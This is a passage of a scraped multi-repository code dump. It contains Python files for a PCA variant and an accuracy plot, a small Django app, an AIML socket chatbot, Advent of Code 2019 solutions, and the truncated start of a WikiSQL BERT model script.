xMat - Y * qMat.T - C/miu\r\n # cal E\r\n for i in range(E.shape[1]):\r\n E[:,i] = (np.max((1 - 1.0 / (miu * np.linalg.norm(A[:,i]))),0)) * A[:,i]\r\n # cal C\r\n C = C + miu * (E - xMat + Y * qMat.T)\r\n # cal miu\r\n miu = 1.2 * miu\r\n\r\n obj1 = np.linalg.norm(qMat)\r\n if m > 0:\r\n diff = obj2 - obj1\r\n if diff < thresh:\r\n break\r\n obj2 = obj1\r\n return Y\r\n\r\ndef cal_projections(X_data,k_d):\r\n nclass = 4\r\n n = len(X_data) # 500\r\n # dist = Eu_dis(X_data)\r\n # max_dist = np.max(dist)\r\n # W_L = cal_rbf_dist(X_data, n_neighbors=9, t=max_dist)\r\n W_L = cal_rbf_dist(X_data, n_neighbors=9, t=1)\r\n R = W_L\r\n M = cal_laplace(R)\r\n Y = RgLPCA_Algorithm(X_data.transpose(), M, 1e2, k_d)\r\n return Y" }, { "alpha_fraction": 0.5701643228530884, "alphanum_fraction": 0.6845765113830566, "avg_line_length": 30.019607543945312, "blob_id": "ec4e5b165e61c504e9fedef9223801677ebd1978", "content_id": "f87cce563ae3706e06385fea5da35356c1e3b552", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1582, "license_type": "no_license", "max_line_length": 104, "num_lines": 51, "path": "/plot/plotACC.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.filterwarnings(\"ignore\")\nfrom mpl_toolkits.mplot3d import *\nfrom matplotlib import cm\nimport mpl_toolkits.mplot3d as p3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pandas as pd\nwarnings.filterwarnings(\"ignore\")\ndatapath1 = 'correct_a_b_k4.csv'\nmean_correct_rate = pd.read_csv(datapath1).values\nxaxis = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200,210]\nyaxis = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200,210]\n# Xaxis,Yaxis = np.meshgrid(xaxis,yaxis)\nXaxis,Yaxis = np.meshgrid(xaxis,yaxis,indexing='ij')\n#Times New Roman\nplt.rcParams['font.sans-serif'] = ['Arial']\nplt.rcParams['axes.unicode_minus'] = False\nfig = plt.figure()\nax = fig.gca(projection='3d')\nplt.rc('font',family='Arial')\nsurf = ax.plot_surface(Xaxis, Yaxis, mean_correct_rate, cmap=cm.coolwarm,linewidth=0, antialiased=False)\nax.set_xlabel('Alpha')\nax.set_ylabel('Beta')\n\n# ax.set_xlabel('Alpha')\n# ax.set_ylabel('Gamma')\n\n# ax.set_xlabel('Gamma')\n# ax.set_ylabel('Beta')\n\nax.set_zlabel('ACC',rotation=90)\nxticks = [10, 60,110,160, 210]\nxticklabels = ['-10', '-5', 0, '5', '10']\nyticks = [10, 60,110,160, 210]\nyticklabels = ['-10', '-5', 0, '5', '10']\nplt.xticks(xticks, xticklabels)\nplt.yticks(yticks, yticklabels)\n#colorbar\nl = 0.9\nb = 0.2\nw = 0.02\nh = 1 - 2 * b\nrect = [l,b,w,h]\ncbar_ax = fig.add_axes(rect)\nfig.colorbar(surf, shrink=0.6, aspect=15,cax=cbar_ax)\nax.set_zlim([0,1.0])\nax.view_init(15,135)\nfig = surf.get_figure()\nplt.show()\n" }, { "alpha_fraction": 0.6253017783164978, "alphanum_fraction": 0.6397875547409058, "avg_line_length": 30.390625, "blob_id": "4f1fdc7d4b3bca3c9a416c556c4c8287ef2a11bf", "content_id": "1ee794ee6fa43226dd40b3c800c0e76e6c6439a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2071, "license_type": "no_license", "max_line_length": 105, "num_lines": 64, "path": "/model/SDSPCA.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef SDSPCA_Algorithm(xMat,bMat,alpha,beta,k,c,n):\r\n obj1 = 0\r\n obj2 = 0\r\n thresh = 1e-50\r\n A = np.random.rand(c, k)\r\n V = np.eye(n)\r\n vMat = np.mat(V)\r\n for m in range(0, 10):\r\n Z = -(xMat.T * xMat) - (alpha * bMat.T * bMat) + beta * vMat\r\n # cal Q\r\n Z_eigVals, Z_eigVects = np.linalg.eig(np.mat(Z))\r\n eigValIndice = np.argsort(Z_eigVals)\r\n n_eigValIndice = eigValIndice[0:k]\r\n n_Z_eigVect = Z_eigVects[:, n_eigValIndice]\r\n Q = np.array(n_Z_eigVect)\r\n # cal V\r\n q = np.linalg.norm(Q, ord=2, axis=1)\r\n qq = 1.0 / (q * 2)\r\n VV = np.diag(qq)\r\n vMat = np.mat(VV)\r\n qMat = np.mat(Q)\r\n # cal Y\r\n Y = xMat * qMat\r\n # cal A\r\n A = bMat * qMat\r\n\r\n obj1 = np.linalg.norm(qMat)\r\n if m > 0:\r\n diff = obj2 - obj1\r\n if diff < thresh:\r\n break\r\n obj2 = obj1\r\n return Y\r\n\r\ndef cal_projections(X_data,B_data,k_d):\r\n nclass = 4\r\n n = len(X_data)\r\n Y = SDSPCA_Algorithm(X_data.transpose(), B_data.transpose(), 1e2, 0.5, k_d, nclass, n)\r\n return Y" } ]
8
narayanmore/more
https://github.com/narayanmore/more
33f6cd592e75e0c06f50cfc19a0eebd7df1d02ca
c853be09a7200d3c25e9934b7071c79e0b3f6e22
3314928b8713f5ed414c9021870757ea611ecdb7
refs/heads/master
2023-08-04T16:49:20.820122
2021-09-08T04:32:05
2021-09-08T04:32:05
404,036,918
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7364864945411682, "alphanum_fraction": 0.75, "avg_line_length": 23.66666603088379, "blob_id": "c8ef9b03563f5377b2038cf61099293befcc54b9", "content_id": "203f8e2f144e04e04665a96325024bc887191c8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/naru3app/apps.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass Naru3AppConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'naru3app'\n" }, { "alpha_fraction": 0.7534722089767456, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 19.64285659790039, "blob_id": "906a19a3be38b779f0ea958d12b6b7b1ef8f7669", "content_id": "ba0f29965587fac7a36efafd3b62f13d4c87eb2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 288, "license_type": "no_license", "max_line_length": 53, "num_lines": 14, "path": "/naru3app/views.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\n@csrf_protect\n\n\ndef intro(request):\n s=\"hi am \"\n return HttpResponse(s)\n\n\ndef intro2(request):\n res=render(request,'naru3app/naru3app.html') \n return res" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 24.200000762939453, "blob_id": "85d23f3f9de6899cecf478845516c358199726c2", "content_id": "dfea39b604326620edd260187a7d4bbcd61cd26f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 53, "num_lines": 10, "path": "/naru4app/views.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\n@csrf_protect\n# Create your views here.\n\n\ndef info(request):\n res=render(request,'naru4app/naru4app.html')\n return res\n" }, { "alpha_fraction": 0.7254902124404907, "alphanum_fraction": 0.7352941036224365, "avg_line_length": 16.16666603088379, "blob_id": "1b0a47ff4c36efb4a3c992f6f45ab8273a47d842", "content_id": "85f9f331fd2c9bf93dce11f54b0cadca2d903f66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/naru4app/urls.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom naru4app import views\nurlpatterns=[\n path('info/',views.info),\n\n]" }, { "alpha_fraction": 0.6870229244232178, "alphanum_fraction": 0.7022900581359863, "avg_line_length": 17.85714340209961, "blob_id": "7368c961203ac4eca1c31ba6067f6102cb902ffe", "content_id": "137f2a244a0b8cabe457539c1252d7d5eaa497d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 131, "license_type": "no_license", "max_line_length": 31, "num_lines": 7, "path": "/naru3app/urls.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom naru3app import views\nurlpatterns=[\n path('intro/',views.intro),\n path('',views.intro2),\n\n]" }, { "alpha_fraction": 0.7280701994895935, "alphanum_fraction": 0.7280701994895935, "avg_line_length": 15.428571701049805, "blob_id": "dadcc5a09cd4d5b2380e60ff8e8fda4a459e4f98", "content_id": "80af77666d53bc52bc1df4b65c960d252be68985", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 38, "num_lines": 7, "path": "/contact/urls.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom contact import views\nurlpatterns=[\n path('contact/',views.funcontact),\n \n\n]" } ]
6
kp625544/chatbot-suchaku
https://github.com/kp625544/chatbot-suchaku
50616e43fb358cf0eb26584c622af4456a8850fc
280780b6e37857d9c00e0bef75389002b783ed01
0aca547294c64c641432ec6ac582c530da2f8383
refs/heads/master
2021-01-12T06:08:49.378934
2017-01-01T06:50:17
2017-01-01T06:50:17
77,316,822
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6094316840171814, "alphanum_fraction": 0.6275695562362671, "avg_line_length": 23.323530197143555, "blob_id": "37d2ca52ad77267994bbcac8d9c48cec0a56807e", "content_id": "3d9ece52a8668fcb5a82e8c11c6d2d19a18d4541", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 827, "license_type": "no_license", "max_line_length": 64, "num_lines": 34, "path": "/server.py", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "import aiml\nimport os\nimport socket\n\nbot = aiml.Kernel();\nbot.setBotPredicate('name', 'suchaku')\nbot.setBotPredicate('master', 'Hydra')\nbot.learn(\"std-startup.xml\")\nbot.respond(\"load aiml b\")\n\ns = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 4447 # Reserve a port for your service.\ns.bind((host, port)) # Bind to the port\n\ns.listen(5) # Now wait for client connection.\n\n\n\n\n#print os.system(\"nc -l -p 4444\")\n\nwhile 1:\n c, addr = s.accept() # Establish connection with client.\n print 'Got connection from', addr\n c.send('Thank you for connecting')\n while 1:\n data = c.recv(1024).decode(\"ascii\")\n #print bot.respond(data)\n c.send(bot.respond(data))\n\n\n\nc.close() # Close the connection\n" }, { "alpha_fraction": 0.5698529481887817, "alphanum_fraction": 0.59375, "avg_line_length": 24.904762268066406, "blob_id": "bbc1560dc5f0097e47f87edcec5b29f5cb410c47", "content_id": "9f016b0a5ef9d9646421ae54151b55bfa0afcc57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 544, "license_type": "no_license", "max_line_length": 86, "num_lines": 21, "path": "/client.py", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "#!/usr/bin/python # This is client.py file\n\nimport socket # Import socket module\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a socket object\nhost = socket.gethostname() # Get server ip\nport = 4447 # Reserve a port for your service.\n\ns.connect((host, port))\n\n#here the magic starts\n\nwhile True:\n print s.recv(1024)\n #s.send(raw_input(\"> \"))\n while 1:\n s.send(raw_input(\"> \").encode())\n print s.recv(1024)\n\n\ns.close() # Close the socket when done\n" }, { "alpha_fraction": 0.7288135886192322, "alphanum_fraction": 0.7559322118759155, "avg_line_length": 14.526315689086914, "blob_id": "f2d8ab4e14e46631a1bf03d04da2cbd40c989219", "content_id": "2f158c1020abf98f2dfa5e3aa61ae8ea19a7e342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 295, "license_type": "no_license", "max_line_length": 49, "num_lines": 19, "path": "/README.md", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "# chatbot-suchaku\n\n# A python 2.7 based ai bot\n\n#For downloading dependencies\n\nsudo python2.7 -m pip install -r requirements.txt\n\n#To start\n\nrun the server.py from the host\n\npython2.7 server.py\n\nrun the client.py from the client\n\npython2.7 client.py\n\ndon't forget to change the IP in the client\n" }, { "alpha_fraction": 0.5137676000595093, "alphanum_fraction": 0.7065144181251526, "avg_line_length": 15.920454978942871, "blob_id": "efb34f879ca157438ad5ad0a04c5ead57a4b16e4", "content_id": "2f253a06c9d42b2329b5a6630eaf172a7e9ae866", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1489, "license_type": "no_license", "max_line_length": 41, "num_lines": 88, "path": "/requirements.txt", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "adium-theme-ubuntu==0.3.4\naiml==0.8.6\nBabel==1.3\nbackports-abc==0.5\nbackports.shutil-get-terminal-size==1.0.0\nbeautifulsoup4==4.4.1\ncertifi==2016.9.26\nchardet==2.3.0\nclick==6.6\ncryptography==1.2.3\ndecorator==4.0.10\ndnspython==1.12.0\ndocutils==0.12\nenum34==1.1.6\nfeedparser==5.1.3\nFlask==0.12\nfuncsigs==0.4\ngdata==2.0.18\nhtml5lib==0.999\nidna==2.0\nipaddress==1.0.16\nipykernel==4.5.2\nipython==5.1.0\nipython-genutils==0.1.0\nitsdangerous==0.24\nJinja2==2.8\njupyter-client==4.4.0\njupyter-core==4.2.1\nknockpy==3.0\nlinecache2==1.0.0\nlxml==3.5.0\nMako==1.0.3\nMarkupSafe==0.23\nmock==1.3.0\npathlib2==2.1.0\npbr==1.8.0\npexpect==4.2.1\npickleshare==0.7.4\nPillow==3.1.2\nprompt-toolkit==1.0.9\npsutil==3.4.2\npsycopg2==2.6.1\nptyprocess==0.5.1\npyasn1==0.1.9\nPyAudio==0.2.8\nPyChart==1.39\npycrypto==2.6.1\npydot==1.0.29\npygeocoder==1.2.5\nPygments==2.1.3\npygobject==3.20.0\npyinotify==0.9.6\npyOpenSSL==0.15.1\npyparsing==2.0.3\npython-dateutil==2.4.2\npython-ldap==2.4.22\npython-openid==2.2.5\npython-stdnum==1.2\npyttsx==1.1\npytz==2014.10\nPyWebDAV==0.9.8\nPyYAML==3.11\npyzmq==16.0.2\nreportlab==3.3.0\nrequests==2.12.4\nroman==2.0.0\nsimplegeneric==0.8.1\nsimplejson==3.8.1\nsingledispatch==3.4.0.3\nsix==1.10.0\nSpeechRecognition==3.5.0\nstevedore==1.12.0\ntornado==4.4.2\ntraceback2==1.4.0\ntraitlets==4.3.1\nunittest2==1.1.0\nunity-lens-photos==1.0\nuTidylib==0.2\nvatnumber==1.2\nvirtualenv==15.0.1\nvirtualenv-clone==0.2.5\nvirtualenvwrapper==4.3.1\nvobject==0.8.1rc0\nwcwidth==0.1.7\nWerkzeug==0.11.11\nxlwt==0.7.5\nzenmap==7.1\nZSI==2.1a1\n" } ]
4
arturo8gll/adventOfCode2019
https://github.com/arturo8gll/adventOfCode2019
09685292377ec7c9e22eda83e454937ec0a0a2ae
ad3a035ab385d2f1e114f9eada20e25b06176d6a
e933e300e81d3560a20dbc07484bc110815f2d75
refs/heads/master
2020-09-22T14:36:23.290186
2019-12-05T06:12:53
2019-12-05T06:12:53
225,241,376
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40835580229759216, "alphanum_fraction": 0.44103774428367615, "avg_line_length": 23.941177368164062, "blob_id": "e526b6c896d4ea957589c3a852503755f477fbf3", "content_id": "0508c135d1d24084751905b9ff266417e1533c84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2968, "license_type": "no_license", "max_line_length": 69, "num_lines": 119, "path": "/day3/part1.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "def med(x):\n l,r,d,u=0,0,0,0\n\n for i in x:\n dir= i[0]\n val=int(i[1:])\n if dir == \"R\":\n # print(\"RIGHT\",val)\n r=r+val\n elif dir == \"L\":\n # print(\"LEFT\",val)\n l=l+val\n elif dir == \"U\":\n # print(\"UP\",val)\n u=u+val\n elif dir == \"D\":\n # print(\"DOWN\",val)\n d=d+val\n return l if l>r else r,d if d>u else u\ndef sum_ruta(x):\n l,r,d,u=0,0,0,0\n\n for i in x:\n dir= i[0]\n val=int(i[1:])\n if dir == \"R\":\n # print(\"RIGHT\",val)\n r=r+val\n elif dir == \"L\":\n # print(\"LEFT\",val)\n l=l+val\n elif dir == \"U\":\n # print(\"UP\",val)\n u=u+val\n elif dir == \"D\":\n # print(\"DOWN\",val)\n d=d+val\n return l+r+u+d\ndef sum_arr(x):\n cont=0\n for i in x:\n cont=cont+sum(i)\n return cont\ndef llenarRuta(ruta,arr,x,y):\n actual=[y,x].copy()\n for i in ruta:\n dir= i[0]\n val=int(i[1:])\n if dir == \"R\":\n # print(\"RIGHT\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[1]=actual[1]+1\n # print(actual)\n elif dir == \"L\":\n # print(\"LEFT\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[1]=actual[1]-1\n # print(actual)\n elif dir == \"U\":\n # print(\"UP\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[0]=actual[0]-1\n # print(actual)\n elif dir == \"D\":\n # print(\"DOWN\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[0]=actual[0]+1\n # print(actual)\n\n return actual\n\ndef print_mat(mat):\n for i in mat:\n print(i)\ndef manhatan(origen,final):\n return abs(origen[0]-final[0])+abs(origen[1]-final[1])\n\nf = open(\"input.txt\", \"r\")\n\nx,y=[i.strip().split(\",\") for i in f.readlines()]\n\n\nx1,x2=med(x),med(y)\n\n# print(x1,x2)\nx0=x1[0] if x1[0]>x2[0] else x2[0]\ny0=x1[1] if x1[1]>x2[1] else x2[1]\n\nprint(y0,x0)\n# arr = [[0 for i in range((x0*2)+2)] for j in range((y0*2)+2)]\n# print(len(arr),len(arr[0]))\n# print(\"ruta 1\",x0,y0)\n# llenarRuta(x,arr,x0,y0)\n# print(\"ruta 2\",x0,y0)\n# llenarRuta(y,arr,x0,y0)\n\n# print(sum_ruta(x),sum_ruta(y))\n\n#print(sum_arr(arr))\n\n# cont=[]\n# for i in range(len(arr)):\n # for j in range(len(arr[i])):\n # if arr[i][j]>1:\n # cont.append(i)\n # break\n# print(\"cruces\",cont)\n# print_mat(arr)\n# man_res=[]\n# for i in cont:\n # for j in range(len(arr[i])):\n # if arr[i][j]==2:\n # man_res.append(manhatan([x0,y0],[j,i]))\n\n# print(sorted(man_res))\n" }, { "alpha_fraction": 0.4988864064216614, "alphanum_fraction": 0.5478841662406921, "avg_line_length": 26.212121963500977, "blob_id": "9f907739bd123b20028c5c8541bb1d3c630399dd", "content_id": "d796aa47b1cbd3e407b971c5e4e10fa31f472e41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 65, "num_lines": 33, "path": "/day2/part2.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "def gas(x1,x2,input):\n input=[int(x) for x in input]\n input[1]=x1\n input[2]=x2\n\n for i in range(4,len(input)+1,4):\n intcode=input[i-4:i]\n if intcode[0]==1:\n input[intcode[3]]=input[intcode[1]]+input[intcode[2]]\n elif intcode[0]==2:\n input[intcode[3]]=input[intcode[1]]*input[intcode[2]]\n\n return input[0]\n\n\ndef part2(num):\n f = open(\"input.txt\",\"r\")\n input = f.readlines()[0].strip().split(\",\")\n cont=0\n valores=[[x,y] for x in range(100) for y in range(100)]\n while len(valores)!=0:\n mitad=int(len(valores)/2)\n y=gas(valores[mitad][0],valores[mitad][1],input.copy())\n if y == num:\n return valores[mitad]\n break\n elif y > num:\n valores=valores[0:mitad]\n elif y < num:\n valores=valores[mitad:len(valores)]\n return false\n\nprint(part2(19690720))\n" }, { "alpha_fraction": 0.6467065811157227, "alphanum_fraction": 0.6646706461906433, "avg_line_length": 15.699999809265137, "blob_id": "692ac76971d12eb3f40a551dc371e7f84c5b90bf", "content_id": "47fffe34094fa1a5798a988e5fbaf468f3caa17b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 26, "num_lines": 10, "path": "/day1/part1.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "from math import floor\ndef fuel(x):\n\treturn floor(x/3)-2\n\nf= open(\"input.txt\",\"r\")\ninput = f.readlines()\ncont=0\nfor i in input:\n cont=cont+fuel(int(i))\nprint(cont)\n" }, { "alpha_fraction": 0.557692289352417, "alphanum_fraction": 0.5705128312110901, "avg_line_length": 16.22222137451172, "blob_id": "422f0d6e75f08aafa68fc19570182490dba9114e", "content_id": "399aed6e3dc6324e522c3b6210148b8f0d34c65e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 24, "num_lines": 18, "path": "/day1/part2.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "from math import floor\nimport numpy as np\ndef fuel(x):\n\treturn floor(x/3)-2\n\nf= open(\"input.txt\",\"r\")\ninput = f.readlines()\narr=[]\nfor i in input:\n cont=0\n aux=int(i)\n while True:\n aux=fuel(aux)\n if aux<=0:\n break\n cont=cont+aux\n arr.append(cont)\nprint(np.sum(arr))\n\n\n" }, { "alpha_fraction": 0.5587583184242249, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 24.05555534362793, "blob_id": "0d896f6c45a55ab16828c32a26b090afa93da951", "content_id": "901fa736c09ac0d839c49a2361d2f8b4af4f17dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 451, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/day2/part1.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "f = open(\"input.txt\",\"r\")\ninput = f.readlines()[0].strip().split(\",\")\ninput=[int(x) for x in input]\ncomp = input.copy()\ninput[1]=12\ninput[2]=2\n\nfor i in range(4,len(input)+1,4):\n intcode=input[i-4:i]\n if intcode[0]==1:\n input[intcode[3]]=input[intcode[1]]+input[intcode[2]]\n elif intcode[0]==2:\n input[intcode[3]]=input[intcode[1]]*input[intcode[2]]\n\n\nfor i in range(4,len(input),4):\n print(i,input[i-4:i])\nprint(len(input))\n" }, { "alpha_fraction": 0.5129337310791016, "alphanum_fraction": 0.5583596229553223, "avg_line_length": 19.320512771606445, "blob_id": "f43380c73e384335beffa086ea5260ff6a285d1f", "content_id": "943183eb0f3fc91b1f677890acf4882f23aac8ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1585, "license_type": "no_license", "max_line_length": 51, "num_lines": 78, "path": "/day3/part2.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "def parserRuta(ruta):\n newRuta=[]\n for i in ruta:\n for j in range(int(i[1:])):\n newRuta.append(i[0])\n return newRuta\n\n\ndef move(dir,actual,toString=False):\n if dir == \"R\":\n # print(\"RIGHT\")\n actual[0]=actual[0]+1\n elif dir == \"L\":\n # print(\"LEFT\")\n actual[0]=actual[0]-1\n elif dir == \"U\":\n # print(\"UP\")\n actual[1]=actual[1]+1\n elif dir == \"D\":\n # print(\"DOWN\")\n actual[1]=actual[1]-1\n if toString==True:\n return f\":{actual[0]},{actual[1]}:\"\n else:\n return actual\ndef manhatan(point):\n return abs(point[0])+abs(point[1])\nfrom time import process_time \nimport re\nt1_start = process_time() \n\nf = open(\"test2.txt\", \"r\")\n\nx,y=[i.strip().split(\",\") for i in f.readlines()]\n# print(parserRuta(x))\n# print(parserRuta(y))\n\nr1=parserRuta(x)\nr2=parserRuta(y)\n\nr1_actual=[0,0]\nr2_actual=[0,0]\n\nr1_ruta=''\nr2_ruta=[]\n# print(move(r1[0],r1_actual))\n# print(move(r1[1],r1_actual))\n# print(move(r1[2],r1_actual))\n\nfor i in r1:\n r1_ruta=r1_ruta+move(i,r1_actual,toString=True)\n # print(move(i,r1_actual))\n # print(r1_ruta)\n\nfor i in r2:\n r2_ruta.append(move(i,r2_actual).copy())\n\n# print(len(r1_ruta))\n# print(len(r2_ruta))\n\n# print(r1_ruta)\n# print(r2_ruta)\n\nres=[]\nj=0\nfor i in r2_ruta:\n print(j)\n # print(f\"{i[0]},{i[1]}\") \n if re.findall( f\":{i[0]},{i[1]}:\", r1_ruta):\n res.append(abs(i[0])+abs(i[1]))\n j=j+1\n#147050\n# print(len(r2_ruta))\nprint(sorted(res))\n\n\nt1_stop = process_time() \nprint(\"Elapsed time:\", t1_stop-t1_start)\n" } ]
6
ds-keshev/sqlova
https://github.com/ds-keshev/sqlova
c0b46a2df68c0a1fceb45497aceb55889738a104
8523af748520cfa78025c6ba28f6b3ed5df8de62
10c428217e32117e258e671642bc77bd6e8d1cdc
refs/heads/master
2020-05-04T10:07:08.348429
2019-06-04T22:32:23
2019-06-04T22:32:23
179,082,064
0
0
Apache-2.0
2019-04-02T13:19:23
2019-04-01T06:14:24
2019-03-26T07:20:19
null
[ { "alpha_fraction": 0.6256480813026428, "alphanum_fraction": 0.6386339068412781, "avg_line_length": 33.178863525390625, "blob_id": "7cd2aa361b91b065445a78f98a72db5faade40cd", "content_id": "2042aaaef94a83945f2cc956403d84d350ce6714", "detected_licenses": [ "Apache-2.0", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21023, "license_type": "permissive", "max_line_length": 153, "num_lines": 615, "path": "/wikisql_ronbert.py", "repo_name": "ds-keshev/sqlova", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Copyright 2019-present NAVER Corp.\n# Apache License v2.0\n\n# Wonseok Hwang\n# Sep30, 2018\nimport os, sys, argparse, re, json,ujson\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import *\nimport tensorflow as tf\nimport random as python_random\n# import torchvision.datasets as dsets\nimport tensorflow_hub as hub\n\nfrom sqlova.utils.utils_wikisql import *\nfrom sqlova.model.nl2sql.wikisql_models import *\nfrom sqlnet.dbengine import DBEngine\nimport bert.tokenization as tokenization\nfrom bert.modeling import BertConfig, BertModel\nfrom tensorflow.keras import backend as K\nimport random\n\n\n# In[2]:\n\n\n# In[14]:\n\n\n# Build model\ndef weighted_categorical_crossentropy(weights):\n \"\"\"\n A weighted version of keras.objectives.categorical_crossentropy\n \n Variables:\n weights: numpy array of shape (C,) where C is the number of classes\n \n Usage:\n weights = np.array([0.5,2,10]) # Class one at 0.5, class 2 twice the normal weights, class 3 10x.\n loss = weighted_categorical_crossentropy(weights)\n model.compile(loss=loss,optimizer='adam')\n \"\"\"\n \n #weights = K.variable(weights)\n \n def loss(y_true, y_pred):\n # scale predictions so that the class probas of each sample sum to 1\n y_pred /= K.sum(y_pred, axis=-1, keepdims=True)\n # clip to prevent NaN's and Inf's\n y_pred = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())\n # calc\n loss = y_true * K.log(y_pred) * weights\n loss = -K.sum(loss, -1)\n return loss\n \n return loss\n\ndef build_model_baseline(max_seq_length,max_out_len): \n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n weight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n \n bert_inputs = [in_id, in_mask, in_segment]\n all_inputs = [in_id, in_mask, in_segment, weight_input]\n bert_output = BertLayer(n_fine_tune_layers=3)(bert_inputs)\n\n denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(bert_output)\n denseSA = tf.keras.layers.Dense(256, activation='relu',name=\"denseSA\")(bert_output)\n denseWN = tf.keras.layers.Dense(256, activation='relu',name=\"denseWN\")(bert_output)\n denseWC = tf.keras.layers.Dense(256, 